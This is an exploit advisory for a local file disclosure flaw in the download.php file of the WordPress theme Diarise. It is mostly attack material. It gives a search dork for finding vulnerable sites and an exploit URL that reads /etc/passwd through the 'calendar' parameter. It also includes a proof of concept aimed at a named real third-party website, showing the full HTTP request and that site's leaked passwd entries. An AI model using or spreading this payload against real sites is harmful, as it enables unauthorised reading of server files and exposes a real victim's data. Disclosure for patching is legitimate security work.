[+] Local File Disclosure in wordpress theme Diarise
[+] Date: 07/05/2019
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork: inurl:"wp-content/themes/diarise/"
[+] Vendor Homepage: https://woocommerce.com/?aff=1790
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://domain.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
[+] PoC: http://tringanglers.org.uk/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
[+] Example:
GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1
Host: tringanglers.org.uk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
root:x:0:0:root:/root:/bin/false
tringanglers.org.uk:x:987900:987900:tringanglers.org.uk:/home/tringanglers.org.uk:/bin/false
eof